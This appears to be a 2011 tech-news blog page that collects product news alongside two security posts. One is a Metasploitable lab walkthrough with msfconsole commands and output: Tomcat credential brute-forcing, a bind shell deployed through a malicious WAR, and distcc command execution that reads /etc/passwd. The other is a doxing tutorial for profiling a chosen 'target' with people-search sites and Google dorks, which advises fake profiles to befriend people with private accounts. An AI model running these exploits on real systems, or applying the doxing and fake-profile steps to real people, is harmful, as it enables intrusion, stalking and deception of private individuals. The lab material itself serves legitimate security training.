Latest Post

Skype Releases Cross-Platform Video for Android Users

Written By Unknown on Thursday 30 June 2011 | 10:45

skype-for-android

Skype's Android client now supports cross-platform video calling, so mobile users can see desktop users and no one has to feel jealous of Apple's FaceTime any more.

The new capability is limited to four models of Android handset, the Desire S, Xperia Neo and Pro and (of course) the Nexus S, but if you have one of those phones then you should be able to make video calls to desktop colleagues and friends over both Wi-Fi and 3G connections.

Video calls between Android devices have been possible for a while, but making a video call from a handset to a desktop has always been difficult on Android, with very limited options available. For most Android users that's still true, but Skype promises that more handsets will be supported "very soon".

The new Android client can switch between front and rear video cameras, so you can show people what you're seeing as well as your own face, and claims to connect to any Skype client including the iPhone and the various Skype-enabled TVs that are now available.

The client is already in the UK Android Marketplace, or can be downloaded direct onto a phone from Skype.

Internet Explorer 10: Microsofts Unveils Preview of It's New Features

Microsoft has released another preview version of Internet Explorer 10, and it has used the occasion to once again explain how it loves the enterprise more than Firefox.

On Wednesday, the company released the second platform preview of IE 10 featuring what it called the "HTML5 engine" behind recent demos of the browser on Windows 8.

According to Microsoft's corporate vice president in charge of IE, Dean Hachamovitch said, the IE10 platform preview means that developers can start working with several "site-ready" HTML5 technologies. Like so many others, Microsoft uses HTML5 as an umbrella term that applies not-only to the still gestating HTML5 standard but also other standards such as JavaScript and CSS.

The IE10 platform preview offers support for CSS3 Positioned Floats, HTML5 Drag-drop, File Reader API, and Media Query Listeners and initial support for HTML5 Forms. Microsoft has also added support for an HTML5 sandbox for iframe isolation.

Much of this is designed to work with the tiled and touch-friendly interface that arrives with the version of Windows 8 for tablets. CSS3 Positioned Floats lets text flow around figures on a page, and it builds on the support for CSS3 grid, multi-column, and flexbox in the first platform preview in April. It's the kind of thing you'd want on any touchy tablet.

Then Hachamovitch alluded to last week's Firefox controversy.

Last week, Mozilla handed Microsoft an easy avenue of attack when it killed support for Firefox 4 following the release of Firefox 5. This is typically the way it works, except that Firefox 5 is the first Mozilla browser delivered on the outfit's new rapid release cycle. It arrived just months after the release of Firefox 4. When one enterprise user piped up to say how this made life very hard for his kind, Mozilla man Asa Dotzler, told him to get over it, saying Mozilla has never, and should never, care about the needs of the enterprise.

Announcing the IE10 preview, Hachamovitch played up Microsoft's long-term support for IE, coupling IE10 with the lifecycle of the forthcoming Windows 8. "Because of this approach to productizing Web technologies, Microsoft will support IE10 for 10 years after its release, honoring the same product lifecycle commitments as Windows itself," Hachamovitch said.

Microsoft has traditionally supported each version of IE for as long as it supports the version of Windows it was built for. With IE9 on Windows 7, support for the browser is due to run until 2020 according to Microsoft. If Windows 8 and IE10 are delivered next year, as is expected, then you can expect Microsoft's IE10 support to run until roughly 2022.

al-Qaeda websites Suffers Distributed Denial of Service Attack

al%2Bqaeda%2Blogo.JPG

Patriot hackers have interfered with al Qaeda's ability to issue videos and messages to supporters via a series of apparently coordinated denial of service attacks against Jihadist websites.

No one has claimed responsibility for the reportedly sophisticated denial of service attacks. Denial of service attacks, at their most basic, involve flooding targeted websites with junk traffic, such as Ping floods. More sophisticated attacks typically involve application layer assaults and attempts to disguise the geographical origin of packets in an attempt to bypass basic traffic filtering techniques.

"Al Qaeda's online communications have been temporarily crippled, and it does not have a single trusted distribution channel available on the internet," Evan Kohlmann, of Flashpoint Global Partners, told MSNBC. The assaults were "well-coordinated and involved the use of an unusual cocktail of relatively sophisticated techniques," Kohlmann said, adding that it may take jihadists several days to restore their internet presence to normal.

The attack is far from the first of its type. Purported ex-military hacker Th3J35ter has claimed attacks on various Jihadi websites in the past, along with attacks on WikiLeaks and its supporters.

Last year sites offering copies of English-language Jihadist magazine Inspire were targeted in an imaginative counter-intelligence operation. British intelligence agents hacked into the sites before replacing downloadable editions of the magazine, which included instructions on how to make bombs, with a PDF containing what looked like gibberish after a few pages. In reality the gibberish material contained nothing more malign than recipes for making cupcakes culled from a book assembled by talk show host Ellen DeGeneres.

However would-be Jihadists were left with the impression they might have downloaded malware, a ruse that succeeded in stymying interest in the site for several weeks.

Final Cut Pro X Faq: Apple Promises Multicam Editing and More

Written By Unknown on Wednesday 29 June 2011 | 10:08

final-cut-pro-x.jpg
By now, most people that are interested in Apple and/or video editing have heard about the ongoing criticism towards Apple’s latest professional movie making software, Final Cut Pro X. Many are calling this total revamp of the Final Cut product an application that is not suited for professionals. Some have even dubbed it as a slightly jazzed up version of iMovie – “iMovie Pro.” Now, Apple has officially responded to this criticism with a new “answers to the most common questions we’ve heard” web page.
Final Cut Pro X is a breakthrough in nonlinear video editing. The application has impressed many pro editors, and it has also generated a lot of discussion in the pro video community. We know people have questions about the new features in Final Cut Pro X and how it compares with previous versions of Final Cut Pro. Here are the answers to the most common questions we’ve heard.
The new website posts some of the most common questions from video editors and provides answers directly from Apple. The website breaks the questions and answers down into these categories: importing, editing, media management, exporting, and purchasing. Some of the answers flat out say that a respective feature is not a part of Final Cut Pro X, some say the respective feature is coming eventually, and other answers tell users that a respective function is present and gives ways of accessing it.

Some choice answers:

Assigning audio tracks for export:

Not yet. An update this summer will allow you to use metadata tags to categorize your audio clips by type and export them directly from Final Cut Pro X.

On exporting to XML:

Not yet, but we know how important XML export is to our developers and our users, and we expect to add this functionality to Final Cut Pro X. We will release a set of APIs in the next few weeks so that third-party developers can access the next-generation XML in Final Cut Pro X.


On multi-cam editing:

Not yet, but it will. Multicam editing is an important and popular feature, and we will provide great multicam support in the next major release.

Thanks, Dane V!

We’ve placed all the questions and answers here:

Import

Can I import projects from Final Cut Pro 7 into Final Cut Pro X?

Final Cut Pro X includes an all-new project architecture structured around a trackless timeline and connected clips. In addition, Final Cut Pro X features new and redesigned audio effects, video effects, and color grading tools. Because of these changes, there is no way to “translate” or bring in old projects without changing or losing data. But if you’re already working with Final Cut Pro 7, you can continue to do so after installing Final Cut Pro X, and Final Cut Pro 7 will work with Mac OS X Lion. You can also import your media files from previous versions into Final Cut Pro X.

Can I import my video directly into Final Cut Pro X as I could in Final Cut Pro 7?

Yes. Final Cut Pro X allows you to import video from a wide range of devices, including many AVCHD-based cameras and DSLR cameras. You can find a list of supported cameras here: http://help.apple.com/finalcutpro/cameras/en/. The list will grow as we continue to test and qualify new cameras.

Some camera manufacturers will need to update their import plug-ins to work with the new 64-bit architecture of Final Cut Pro, and we are working with them to provide these updates as quickly as possible. Until then, you can use your camera manufacturer’s import software to convert video for Final Cut Pro X.

For example, Sony offers an XDCAM Transfer application that allows you to convert XDCAM video without transcoding so it can be imported into Final Cut Pro X. You can find more information here: http://support.apple.com/kb/HT4724. If you are working with RED cameras, you can use the free RED software REDCINE-X, designed to transcode RED RAW video to ProRes for use in Final Cut Pro X: https://www.red.com/support/all/downloads.

Editing

Can I edit my tape-based workflow with Final Cut Pro X?

Yes, in a limited manner. Final Cut Pro X is designed for modern file-based workflows and does not include all the tape capture and output features that were built into Final Cut Pro 7. Final Cut Pro X does support FireWire import for DV, DVCPRO, DVCPRO 50, DVCPRO HD, and HDV. In addition, companies like AJA and Blackmagic offer free deck control software that allows you to capture from tape and output to tape.

Does Final Cut Pro X support multicam editing?

Not yet, but it will. Multicam editing is an important and popular feature, and we will provide great multicam support in the next major release. Until then, Final Cut Pro X offers some basic support with automatic clip synchronization, which allows you to sync multiple video and audio clips using audio waveforms, creating a Compound Clip that can be used for simple multicam workflows.

Does Final Cut Pro X support external monitors?

Yes. If you have a second computer monitor connected to your Mac, Final Cut Pro X gives you options to display the interface across multiple monitors. For example, you can place a single window — such as the Viewer or the Event Browser — on the second monitor, while leaving the other windows on your primary monitor. Like previous versions, Final Cut Pro X relies on third-party devices to support external video monitoring. We’ve been working with third-party developers in our beta program to create drivers for Final Cut Pro X, and AJA has already posted beta drivers for its popular Kona card: http://www.aja.com/support/konaNEW/kona-3g.php.

Can I save different versions of my project?

Yes. Final Cut Pro X automatically saves your project during the editing process, so you never lose your work. If you want to save a version of your project, with or without duplicate media, select it in the Project Library and choose File > Duplicate Project.

Are keyboard shortcuts in Final Cut Pro X different from those in Final Cut Pro 7?

Many keyboard shortcuts for navigation, start/end marking, and tools are the same in Final Cut Pro X and Final Cut Pro 7. Some keyboard shortcuts have changed to support new features. Final Cut Pro X offers powerful keyboard customization, and you can view and modify keyboard shortcuts at any time by choosing Final Cut Pro > Commands > Customize.

Can I use my third-party plug-ins in Final Cut Pro X?

You’ll be able to use them as soon as they are updated. Because Final Cut Pro X has a modern 64-bit architecture, third-party plug-ins must be 64-bit too. Final Cut Pro X already supports 64-bit Audio Units plug-ins. For motion graphics, third-party developers can build effects, titles, transitions, and generators as templates in Motion 5 for use directly in Final Cut Pro X. Developers can also build 64-bit FxPlug 2 plug-ins for Motion 5, and integrate those plug-ins into templates that can be used in Final Cut Pro X. These templates, together with any associated FxPlug 2 plug-ins, will work in Final Cut Pro X even if Motion is not installed on the computer.

Media Management

Can I specify a scratch disk location?

Yes. When you import media, you can specify the Event and the drive where you’d like to put it. You can also specify where you’d like to put your project. In Final Cut Pro X, a project and its rendered media always travel together in the same folder, so it’s easy to move projects between different hard drives and computers.

Can I share projects with other editors?

Yes. You have several options for sharing projects. You can hand over just the project file, and the recipient can reconnect the project to his or her own copies of the Event. Or you can send the complete project and Event as a package to another editor. Final Cut Pro X includes options for duplicating, moving, and consolidating projects and associated media to streamline sharing between editors.

Can I store media in locations other than my system drive?

Yes. Turning off the “Copy files to Final Cut Events folder” option leaves the imported files where they are currently located. You can also move the project and associated media at any point during the editing process by dragging the project to another mounted hard drive within the Project Library.

Can I hide Events that I am not working on?

Yes. You can hide Events in Final Cut Pro X by moving them out of the Final Cut Events folder. In the Finder, navigate to the /Users/username/Movies folder and create a new folder. Then move the Events you are not using out of the Final Cut Events folder and into your new folder. The moved Events will no longer appear in Final Cut Pro X. If your Events are located on an external drive, you can move the Events to a new folder on that drive, or you can simply unmount the drive.

Export

Can Final Cut Pro X export XML?

Not yet, but we know how important XML export is to our developers and our users, and we expect to add this functionality to Final Cut Pro X. We will release a set of APIs in the next few weeks so that third-party developers can access the next-generation XML in Final Cut Pro X.

Does Final Cut Pro X support OMF, AAF, and EDLs?

Not yet. When the APIs for XML export are available, third-party developers will be able to create tools to support OMF, AAF, EDL, and other exchange formats. We have already worked with Automatic Duck to allow you to export OMF and AAF from Final Cut Pro X using Automatic Duck Pro Export FCP 5.0. More information is available on the Automatic Duck website: http://automaticduck.com/products/pefcp/.

Can I send my project to a sound editing application such as Pro Tools?

Yes; you can export your project in OMF or AAF format using Automatic Duck Pro Export FCP 5.0. More information is available on the Automatic Duck website: http://automaticduck.com/products/pefcp/.

Does Final Cut Pro X allow you to assign audio tracks for export?

Not yet. An update this summer will allow you to use metadata tags to categorize your audio clips by type and export them directly from Final Cut Pro X.

Can I customize my export settings?

Yes. Compressor 4, available from the Mac App Store for $49.99, allows you to create a wide variety of custom export settings that you can use in Final Cut Pro X. The most popular export options and formats, including ProRes and H.264, are already built into Final Cut Pro X.

Purchase

Can I purchase a volume license?

Final Cut Pro X, Motion 5, and Compressor 4 Commercial and Education Volume Licensing will be available soon via the Apple Online Store for quantities of 20 or more. After purchasing, customers will receive redemption codes they can use to download the applications from the Mac App Store.

Anonymous releases Doc's containing Sophisticated Hacking Techniques

anon_displayv2.jpg
Anonymous has issued a beginner's guide to hacking online under the title, School4Lulz, which also contains sophisticated SQL Injection methods used by both Hacking Groups in their Hacking Attacks.

Shortly after the famous hacking group "Lulzsec" announced their disbandment, it now seems the online 'hacktivist' collective are clearly looking for buddies to continue its fight under the banner Operation InfoSec - and one way of recruiting fellow travellers, it seems, is to issue them with a Hacking 101.

School4Lulz is available at the group's 'Lolhackers' site, and provides information on hacking techniques including as the so-called 'SQL injection' method used by both Anonymous and LulzSec in a number of their high-profile hacking attacks. Instructor-in-chief 'Hatter' also dishes out some advice on probing site vulnerabilities.

A downloadable 'Basic to Advance (sic) hacking guide' Zip file containing PDF versions of the school's lessons, has also been posted at a well-known online cyber locker site and file hosting site.

Groupon India Accidentally Published 300,000 Text Password of Users

sosasta
Groupon subsidiary Sosasta.com accidentally published a database containing the email addresses and clear-text passwords of 300,000 users and the cache was indexed by Google.

The trove of personal data was discovered by Australian security consultant Daniel Grzelak as he plugged a handful of query terms into the search engine, he said Tuesday. He contacted Patrick Gray with security blog Risky Biz, which reported that the SQL database contained the details for 300,000 Sosasta account holders.

A Groupon spokesman confirmed that the digital coupon distributor “was alerted to a security issue” on Thursday night and corrected the problem immediately. The issue was limited to Sosasta, which uses its own servers and network and isn't connected to Groupon's systems in other countries.

“We have begun notifying our subscribers and advising them to change their Sosasta passwords as soon as possible,” the spokesman said in a statement. “We will keep our Indian subscribers fully informed as we learn more.”

At time of writing, there was no advisory on either the Groupon or Sosasta websites, although Sosasta's Facebook page contained a notice that came in the form of a JPG image that couldn't easily be indexed by Google or other search engines. Ah the irony.

According to Risky Biz, Grzelak found the massive cache as he was looking for additions to shouldichangemypassword.com, a side project that indexes email addresses included in more than a dozen high-profile privacy breaches carried out by LulzSec and other hacking groups. The query that hit pay dirt included the terms “filetype:sql” “password” and “gmail.”

“I started scrolling, and scrolling and I couldn't get to the bottom of the file,” Grzelak told Risky Biz. “Then I realised how big it actually was.”

The Groupon statement didn't say why passwords weren't encrypted or why such a sensitive file was publicly available.

The snafu is the latest to expose the folly of using the same password on more than one site, a practice still followed by a shockingly high number of people. If you're one of them, you ought to consider using a password-management program such as Password Safe or KeePass.

The Groupon subsidiary sure isn't the first to carelessly expose data it has promised to keep private, and judging from this Google search, it's probably not the last.

Introducing Metasploitable: Testing Your Metasploit Against A Vulnerable Host


Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql.

Note: If you don't know anything about this tool, i strongly recommend this free Metasploit online course called Metasploit Unleashed. It coveres multiple topics on this tool.

You can use most VMware products to run it, and you'll want to make sure it's configured for Host-only networking unless it's in your lab - no need to throw another vulnerable machine on the corporate network. It's configured in non-persistent-disk mode, so you can simply reset it if you accidentally 'rm -rf' it.

There are various other similar setups you can test out your hacking kung-fu on like:
Here are a couple of the things you can do with it in msfconsole:

Using the 'Tomcat Application Manager Login Utility' provided by MC, Matteo Cantoni, and jduck, you can test credentials against a Tomcat application (assuming the manager component is enabled):

msf > use scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set RHOSTS metasploitable
msf auxiliary(tomcat_mgr_login) > set RPORT 8180
msf auxiliary(tomcat_mgr_login) > exploit

...
[*] 10.0.0.33:8180 - Trying username:'tomcat' with password:'role1'
[-] http://10.0.0.33:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'tomcat'
[*] 10.0.0.33:8180 - Trying username:'tomcat' with password:'root'
[-] http://10.0.0.33:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'tomcat'
[*] 10.0.0.33:8180 - Trying username:'tomcat' with password:'tomcat'
[+] http://10.0.0.33:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login 'tomcat' : 'tomcat'
[*] 10.0.0.33:8180 - Trying username:'both' with password:'admin'

Woot! That's a valid (tomcat:tomcat) login. - Now that we have valid credentials, let's try jduck's Tomcat Manager Application Deployer (tomcat_mgr_deploy) against it:

msf > use multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set RHOST metasploitable
msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat
msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
msf exploit(tomcat_mgr_deploy) > set RPORT 8180
msf exploit(tomcat_mgr_deploy) > set PAYLOAD linux/x86/shell_bind_tcp
msf exploit(tomcat_mgr_deploy) > exploit

[*] Started bind handler
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux X86"
[*] Uploading 1612 bytes as HJpy1H.war ...
[*] Executing /HJpy1H/EpKaNLsCQUUjo.jsp...
[*] Undeploying HJpy1H ...
[*] Sending stage (36 bytes) to metasploitable
[*] Command shell session 1 opened (10.0.0.11:39497 -> 10.0.0.33:4444) at 2010-05-19 11:53:12 -0500

Sweet! And... that's a shell, facilitated by a malcious .WAR file. The distcc_exec module is also a nice exploit to test with. In this case, we'll use a command payload to 'cat /etc/passwd':

use unix/misc/distcc_exec
msf exploit(distcc_exec) > set PAYLOAD cmd/unix/generic
msf exploit(distcc_exec) > set RHOST metasploitable
msf exploit(distcc_exec) > set CMD 'cat /etc/passwd'
msf exploit(distcc_exec) > exploit
connecting...

[*] stdout: root:x:0:0:root:/root:/bin/bash
[*] stdout: daemon:x:1:1:daemon:/usr/sbin:/bin/sh
...

Code exec!

It's great fun to run Express against it too. A single bruteforce of ssh or telnet will return 5 sessions (from the 5 different weak accounts on the VM).

Once we have an open session we can run "Evidence Collection" and pick up any ssh keyfiles from the user accounts we gained access to. (Note that you can do this from the console too, manually - spawn a shell and check the .ssh directories). Now when we run another bruteforce (with 'known' credentials), it uses the SSH keyfiles to obtain access to the box.

To download Metasploitable, you can pick up the torrent here. A README.txt can be found within the torrent containing passwords (beware of spoilers). If you are an Express customer, you can pick up a direct HTTP download from the Customer Center.

Read more: Metasploit: Introducing Metasploitable

Office 365: Microsoft finally Releases Office 365

Written By Unknown on Tuesday 28 June 2011 | 12:02

office365
Today, at media events around the world, Microsoft Corp. announced the availability of Microsoft Office 365, the company’s newest cloud service. Office 365 is now available in 40 markets, and it brings together Microsoft Office, Microsoft SharePoint Online, Microsoft Exchange Online and Microsoft Lync Online in an always-up-to-date cloud service, at a predictable monthly subscription.

The service was introduced in beta last year with enthusiastic response and, in a few months, more than 200,000 organizations signed up and began testing it. Businesses using Office 365 are already reporting impressive results and reducing IT costs by up to an estimated 50 percent while boosting productivity.

Today, more than 20 service providers around the globe also shared plans to bring Office 365 to their customers this year. Bell Canada, Intuit Inc., NTT Communications Corp., Telefonica S.A., Telstra Corp. and Vodafone Group Plc, among others, will package and sell Office 365 with their own services for small and midsize businesses.

“Great collaboration is critical to business growth, and because it’s so important, we believe the best collaboration technology should be available to everyone,” said Microsoft CEO Steve Ballmer. “With a few clicks, Office 365 levels the playing field, giving small and midsize businesses powerful collaboration tools that have given big businesses an edge for years.”

A Game Changer for Businesses of All Sizes

Office 365 is available in a wide range of service plans designed to meet the needs of businesses of all sizes, ranging from the largest to the smallest.

With Office 365, people can stay on the “same page” using instant messaging and virtual meetings with people who are just down the hall or across the world. They can work on files and documents at the same time and share ideas as easily as they can share calendars. Office 365 gives people new ways to work together with ease, on virtually any device.

Microsoft Office applications are at the heart of Office 365. Microsoft Word, PowerPoint, Excel, OneNote, Outlook and other Office applications connect to Microsoft Exchange, SharePoint and Lync to deliver a world-class solution for communication and collaboration.

“When I saw Office 365, I knew this was the way businesses would work in the future,” said Elia Wallen, owner of fast-growing temporary housing provider Travelers Haven. “With Office 365, I’m going to save $100,000 a year and cut 30 hours of work a day across my 35 employees, but most importantly, my team is going to be able to work together better — no matter where they are.”

More stories from businesses that have tried Office 365 are available at http://www.microsoft.com/casestudies.

Office 365 Partners

Microsoft is building a massive partner ecosystem around Office 365, including systems integrators, software vendors, resellers and other partners. Today, that ecosystem is expanding as the company partners in new ways with market-leading service providers. These companies will package Office 365 with their own services — from Web hosting and broadband to finance solutions and mobile services — and bring those new offerings to millions of small and midsize businesses globally.

“Our partners represent some of the best-known, most-trusted brands in their local markets,” said Kurt DelBene, president, Microsoft Office Division. “Our customers will be able to rest easy knowing their cloud services are backed by Microsoft and some of the greatest service providers in the world.”

A list of Office 365 service provider partners is available here.

About Office 365

Office 365 offers a range of service plans for a predictable monthly price from $2 to $27 per user per month. With Office 365 for small businesses, customers can be up and running with Office Web Apps, Microsoft Exchange Online, Microsoft SharePoint Online, Microsoft Lync Online and an external website in minutes, for $6 (U.S.) per user, per month. These tools put enterprise-grade email, shared documents, instant messaging, video and Web conferencing, portals, and more at everyone’s fingertips.

Office 365 for enterprises has an array of choices, from simple email to comprehensive suites to meet the needs of midsize and large businesses, as well as government organizations. Customers can now get Microsoft Office Professional Plus on a pay-as-you-go basis with cloud-based versions of the industry’s leading business communications and collaboration services. Each of these plans comes with the advanced IT controls, innovative security technologies, 24/7 IT support and reliability customers expect from Microsoft.

Availability

Office 365 for small businesses and Office 365 for enterprises are available now. Businesses can try Office 365 for free for 30 days by signing up at http://www.office365.com or from their local Microsoft partner. Follow Office 365 on Twitter (@Office365), Facebook (http://www.facebook.com/office365) and the Office 365 blog at http://community.office365.com for the latest information.

Google + Project: Finally Arrives, threathens Social Giants, Facebook

Googleplus
Google took its biggest leap yet onto Facebook’s turf on Tuesday, introducing a social networking service called the Google+ project — which happens to look very much like Facebook.

The service, which will initially be available only to a select group of Google users who will soon be able to invite others, will let people share and discuss status updates, photos and links.

But the Google+ project will be different from Facebook in one significant way, which Google hopes will be enough to convince people to use yet another social networking service. It is designed for sharing with small groups — like colleagues, college roommates or hiking friends — instead of with all of a user’s friends or the entire Web. It also offers group text messaging and video chat.

“In real life, we have walls and windows and I can speak to you knowing who’s in the room, but in the online world, you get to a ‘Share’ box and you share with the whole world,” said Bradley Horowitz, a vice president of product management at Google who is leading the company’s social efforts with Vic Gundotra, a senior vice president of engineering.

The debut of Google+ will test whether Google can overcome its past flops in social networking, like Buzz and Orkut, and deal with one of the most pressing challenges facing the company.

At stake is Google’s status as the most popular entry point to the Web. When people post on Facebook, which is mostly off-limits to search engines, Google loses valuable information that could benefit its Web search, advertising and other products.

Googleplus

Google+ may already be too late.

In May, 180 million people visited Google sites, including YouTube, versus 157.2 million on Facebook, according to comScore. But Facebook users looked at 103 billion pages and spent an average of 375 minutes on the site, while Google users viewed 46.3 billion pages and spent 231 minutes.

Advertisers pay close attention to those numbers, and to the fact that people increasingly turn to Facebook and other social sites like Twitter to ask questions they used to ask Google, like a recommendation for a restaurant or doctor, because they want more personalized answers.

Mr. Gundotra and Mr. Horowitz said that knowing more about individual Google users will improve all Google products, including ads, search, YouTube and maps, because Google will learn what people like and eventually be able to personalize those products.

“To think we could achieve Google’s stated mission of organizing the world’s information absent people would be ludicrous,” Mr. Horowitz said.

But Google has been criticized for failing to understand the importance of social information on the Web until competitors like Facebook and Twitter had already leapt ahead. Part of the blame, analysts say, falls on Google’s engineering-heavy culture, which values quantitative data and algorithms over more nuanced, touchy-feely pursuits like socializing.

Exhibit A is Buzz, a social sharing tool for Gmail users. It automatically included users’ e-mail contacts in their Buzz network, setting off widespread criticism that Google invaded users’ privacy and failed to understand that people’s e-mail contacts are not necessarily their friends.

Google quickly changed the service so it did not automatically connect friends. In March, Google settled with the Federal Trade Commission over charges of deceptive privacy practices related to Buzz and agreed to 20 years of audits.

Mr. Gundotra and Mr. Horowitz, both of whom worked on Buzz, say they were chastened by the experience. They said Google+ grew out of those mistakes, because they realized how much people care about controlling the information they share.

And unlike its approach with Buzz, which was tested only by Google employees before its broad introduction to the public, Google is calling Google+ a project to emphasize that it is not a final product, saying it will undergo many changes to fix problems and introduce new features. Still, its new Web site, plus.google.com, is Google’s most fully formed social networking tool yet.

Mr. Gundotra and Mr. Horowitz said they took pains to mimic people’s relationships in real life and eliminate the social awkwardness that things like friend requests and oversharing can generate on other sites.

Google+ users will start by selecting people they know from their Gmail contacts (and from other services, once Google strikes deals with them). They can drag and drop friends’ names into different groups, or circles, and give the circles titles, like “sisters” or “book club.”

Unlike on Facebook, people do not have to agree to be friends with one another. They can receive someone’s updates without sharing their own. Users can also view their Google+ page the way their friends see it, to ensure their bosses do not see pictures from Saturday night, for instance.

Google+ users will see a toolbar on top of any Google site they use, where they can click to share something or see updates from friends. Eventually, the toolbar could appear on other Web sites. Google+ will also improve the usefulness of other Google products that have not gained traction, like Latitude for sharing your location and +1 for giving a thumbs-up to a particular site in search results, the executives said.

When users visit their Google+ homepage, they see three columns and a stream of status updates in the middle that looks remarkably like Facebook. But Google said that besides an easier way to share with select groups, Google+ has several other features that distinguish it from competitors.

It offers high-definition group video chat, called Hangouts, that other members of a group can join as it is happening. Users can search a section called Sparks to see articles and videos from across the Web on certain topics, like recipes or Alzheimer’s disease, and share them with relevant groups of friends.

And on the Google+ mobile app for Android phones and iPhones, people can chat with groups using a feature called Huddle. Photos and videos shot with cellphones are automatically uploaded to a private album, so Google+ users can quickly view and post them from their phones or later on a computer.
huddle

With these services, Google will compete with a host of start-ups, like Path for sharing with small groups, SocialEyes for video chat, Flipboard for articles on certain topics and GroupMe for group texting.

“The notion that online sharing is broken is not an insight that is unique to us,” Mr. Horowitz said. “We have a way to bring in millions of users in a way that is challenging for a start-up.” 

Doxing - A Way of Tracing Anonymous People

Written By Unknown on Monday 27 June 2011 | 12:05

doxing.jpgDoxing is a way of tracing someone or getting information about an individual using sources on the internet and social engineering techniques. It's term was derived from --Documents-- as a matter of fact its the retrieval of Documents on a person or an organization.

I saw a well detailed information on how to implement this techniques and i will be sharing it here. As presented by Chintan Gurjar below is a technique to trace an anonymous person.

What is Doxing ?

Doxing(“Documents” or “Docx”) is the part of technique “Tracing”. It plays an important role in tracing. To gathering all available information is called as doxing. In information there are many informations like documents,victim’s name, gender and also that on internet on which which website, the person is there and by which which name and nick name. We are choosing the specific target.In this tutorial i will show you how to get the information about any particular individual. Doxing is easy depends on the available information about the specific target and it also depends on that how many information is available of that specific target right now. Doxing technique is very useful to solve the “Cyber Crime Cases”.With the help of this tutorial you will come to know that how the hackers dox the innocent people and make them victim to hack their email id accounts, Facebook accounts and their websites by implementing social engineering techniques.

For the Specific Target Here are some parts for which you should collect the information.
(1) Name
(2) Gender
(3) Birthday
(4) Age
(5) Website
(6) Email Id
(7) Social Networking Site Profiles -> Facebook/Yahoo/Orkut/Twitter/My space
(8) Location/Area/Country
(9) IP – Address

Once hacker have all this information,the next step of hacker is to go to the http://www.google.com/ and he can input the name of the specific target.The target’s all social networking site profile id will display Google. Hacker will copy paste it and then open that link into his browser.Then he/she can see the every information about the target.If the target’s profile ids completely private then hacker can make a girl’s profile and then can add him/her.-( Best Solution :- Social Engineering Technique).

How To Do Doxing ?

(1)Using The Email Address Of Your Target

So, We have some basic very nice website to find the information about target.
Step 1 :- Click on the Email
Step 2 :- Provide Email address and then click on search.
Step 3 :- It will show all the profiles which is made by this email id which u have given to Pipl.com of target

Websites Used For Doxing :-
www.pipl.com (i will recommended you this)
www.wink.com
www.123people.com
www.zabasearch.com

(2)Using The Name Of Your Target

Here also We have some basic very nice website to find the information about target.
Step 1 :- Click on the Name
Step 2 :- Provide Name and then click on search.
Step 3 :- It will show all the profiles which is made by this name/nickname which u have given to Pipl.com of target .

Websites Used For Doxing :-
www.pipl.com (i will recommended you this)
www.wink.com
www.123people.com
www.zabasearch.com

(3)Using The Location Of Your Target

Here you can do doxing with the help of the adress also.There are some sites which provides this type of services.If target has given any adress to the any social networking website then you can trace it by the help of the given below website.
Websites :-
www.addresses.com
www.411locate.com
www.411.com
www.whitepages.com

Do Doxing With The Help of google

Google is the very nice site and source to do the doxing.
Example :- Here i m Providing name – “XYZ” and we will see that how one can mine the Google dork and can find the everything.

a. Inurl :- This is a very nice dork to find the website directly from the Google. Suppose i want to find the www.chintan.com then i will give this type of query.
Inurl:.sitename.com

b. Intitle :- This is also a nice query.if suppose on any page the world “XYZ” is written in the title then i can find it directly by this query.
Intitle:xyz

c. Intext :- On any webpage of the world,if the name is written like “xyz” then i can find by this a simple query.
Intext:xyz

Now we will bind this all query to do doxing.

Case 1 :- Suppose i want to find the person named “xyz” but only from this website www.site.com.Then i will make this query.
Inurl:.sitename.com & intitle:xyz or
Inurl:. sitename.com & intext:xyz
This query will give me the all result of the web page of the website freehacking.net which have this XYZ name on any particular page.

So, This are the basic techniques of doxing, and if you've got any tips and ideas you feel you can share, please don't hesitate to use the comment box.

CourseKit: College Students Aim to Build a Better Way to Manage Courses

coursekit-dudes.jpg
Three students at the University of Pennsylvania—Joseph Cohen, Dan Getelman, and Jim Grandpre—are quitting school to launch a new education startup called Coursekit, and they’ve raised $1 million in a seed round to do it. (Peter Thiel would be proud). The New York City startup just closed a seed round from Founder Collective, IA Ventures, Shasta Ventures and some angels. IA Ventures led the round.

Coursekit is like Facebook or Yammer for courses. Like many other students frustrated with Blackboard, the current online course management standard, the Coursekit founders think they can do a better job. “It is really a Blackboard replacement with a heavy emphasis on social networking,” says CEO Cohen.

The service will launch later this summer in time for the Fall semester. It’s a place where teachers can post their syllabus, reading materials, grades, calendars, links, and so on. It is designed as a way for professors to manage their course and interactions with students.

Coursekit.jpg

But it is also a social messaging system for students to communicate with each other. “We want a 300 person lecture feel like a 20 person seminar,” says Cohen. Students can share links, videos, MP3s, and other files like PDFs. In this way, they can bring in relevant material from the Web to enhance the course and teach each other.

Source: TechCrunch

How to Keep Malware Off Your Android Phone

angry_droid-5149854.jpg
Although some of these apps might look suspicious, others bearing names such as "Quick Notes" or "Chess" seem innocent enough, and you might not think twice about downloading them.

Tips for a Malware-Free Smartphone

Following are five quick tips to help you keep your Android handset free of malware.
  1. Always research the publisher of the app. What other apps does it offer? Do any of them look a bit shady? If so, you should probably stay away.
  2. Read online reviews. Android Market reviews may not always be truthful. Check around to see what reputable Websites are saying about the app before you hit the download button.
  3. Always check app permissions. Whenever you download or update an app, you get a list of permissions for it. An alarm clock app, for instance, probably shouldn't need to look through your contacts. The general rule of thumb: If an app is asking for more than what it needs to do its job, you should skip it. 
  4. Avoid directly installing Android Package files (APKs). When Angry Birds first came to Android, you could get it only through a third party. This is called "sideloading," or installing apps using an .APK file. Although Angry Birds wasn't malware, in general it is highly advisable not to download and install .APK files that you randomly come across. Most of the time you won't know what the file contains until you install it--and by then it's too late.
